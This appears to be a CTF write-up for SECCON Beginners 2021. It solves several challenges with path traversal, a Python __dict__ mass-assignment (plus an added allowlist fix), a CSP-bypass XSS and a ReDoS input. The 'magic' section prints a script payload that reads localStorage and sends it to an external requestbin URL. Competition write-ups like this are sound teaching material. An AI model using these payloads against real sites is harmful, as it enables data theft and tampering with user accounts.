@shiv3
Last active May 24, 2021 05:23
ctf4b 2021 writeup

ctf4b 2021

I took part a little.

osoba

Just specify the path.

$ curl "https://osoba.quals.beginners.seccon.jp/?page=/flag"
ctf4b{omisoshiru_oishi_keredomo_tsukuruno_taihen

Werewolf

Since the app writes straight into Python's __dict__, it looked like posting __role too would set it.

>>> class Player:
...     def __init__(self):
...         self.name = None
...         self.color = None
...         self.__role = random.choice(['VILLAGER', 'FORTUNE_TELLER', 'PSYCHIC', 'KNIGHT', 'MADMAN'])
>>> import random
>>> player = Player()
>>> player
<__main__.Player instance at 0x107fd8950>
>>> player.__dict__
{'color': None, 'name': None, '_Player__role': 'FORTUNE_TELLER'}
>>>

Actually running it, the key inside __dict__ turns out to be _Player__role, so send that instead.

$ curl 'https://werewolf.quals.beginners.seccon.jp/' -X POST -d "_Player__role=WEREWOLF"

...
<p id="flag">ctf4b{there_are_so_many_hackers_among_us}</p>
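The name-mangling point above, as an added example (not the challenge's code): a Player class like the one in the writeup, a hypothetical update_vulnerable that copies form fields straight into __dict__ (the pattern the challenge appears to use), and a hardened update that only accepts an allowlist of public fields. The constructed form dict below carries the mangled key _Player__role.

```python
import random

ROLES = ['VILLAGER', 'FORTUNE_TELLER', 'PSYCHIC', 'KNIGHT', 'MADMAN']


class Player:
    """Same shape as the Player in the writeup: a double-underscore 'private' role."""

    ALLOWED_FIELDS = ('name', 'color')  # public, user-editable fields only (assumption)

    def __init__(self):
        self.name = None
        self.color = None
        # CPython mangles __role to _Player__role; it is a naming convention, not access control
        self.__role = random.choice(ROLES)

    @property
    def role(self):
        return self.__role

    def update_vulnerable(self, form):
        # Hypothetical: request fields written directly into __dict__.
        # Any key, including the mangled '_Player__role', lands on the instance.
        self.__dict__.update(form)

    def update_hardened(self, form):
        # Copy only allowlisted public fields; unknown keys are ignored.
        for key in self.ALLOWED_FIELDS:
            if key in form:
                setattr(self, key, form[key])


def mangled_name_for(cls, attr):
    """Reproduce CPython's rule: __attr inside class C is stored as _C__attr."""
    return '_' + cls.__name__.lstrip('_') + attr


def demo():
    # Constructed POST body, decoded into a dict as a web framework would
    form = {'name': 'alice', 'color': 'red', '_Player__role': 'WEREWOLF'}
    vulnerable, hardened = Player(), Player()
    vulnerable.update_vulnerable(form)
    hardened.update_hardened(form)
    return {'vulnerable_role': vulnerable.role,
            'hardened_role': hardened.role,
            'hardened_name': hardened.name}


if __name__ == '__main__':
    print(demo())  # vulnerable_role is 'WEREWOLF'; hardened_role stays one of ROLES
```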

magic

The CSP looks like this:

Content-Security-Policy: 
style-src 'self' ; 
script-src 'self' ; 
object-src 'none' ; 
font-src 'none'

Given that, the only options seem to be uploading a JS file or finding somewhere that outputs JS as-is.

Reading the code, I found this escaping in the token error output:

function escapeHTML(string) {
  return string
    .replace(/\&/g, "&amp;")
    .replace(/\</g, "&lt;")
    .replace(/\>/g, "&gt;")
    .replace(/\"/g, "&quot;")
    .replace(/\'/g, "&#x27");
}

So I made that spot output JS code and loaded it with a script tag.

All it needed was to get Submit pressed, but I ended up writing one that pointlessly sends the data out to an external host.

<script src="https://magic.quals.beginners.seccon.jp/magic?token=v=document.createElement(`img`);%20m=localStorage.getItem(%27memo%27);%20v.setAttribute(`src`,`http://requestbin.net/r/7c30tqu0?${m}`%20);%20document.body.appendChild(v);//"></script>

only_read

Plodded through it bit by bit in Hopper.

children

I figured the flag would come out if I kept answering with the PIDs, and when I ran it, it did.

$ ./children
I will generate 10 child processes.
They also might generate additional child process.
Please tell me each process id in order to identify them!
Please give me my child pid!
353
ok
...
Please give me my child pid!
364
ok
How many children were born?
13
ctf4b{p0werfu1_tr4sing_t0015_15_usefu1}

Mail_Address_Validator

This seemed to be a ReDoS-style problem.

https://blog.ohgaki.net/redos-must-review-mail-address-validation

Just sending a 1000-character mail address produced the flag.

$ python -c "print 'A'*1000+'@.com'" | nc mail-address-validator.quals.beginners.seccon.jp 5100

I check your mail address.
please puts your mail address.
ctf4b{1t_15_n0t_0nly_th3_W3b_th4t_15_4ff3ct3d_by_ReDoS}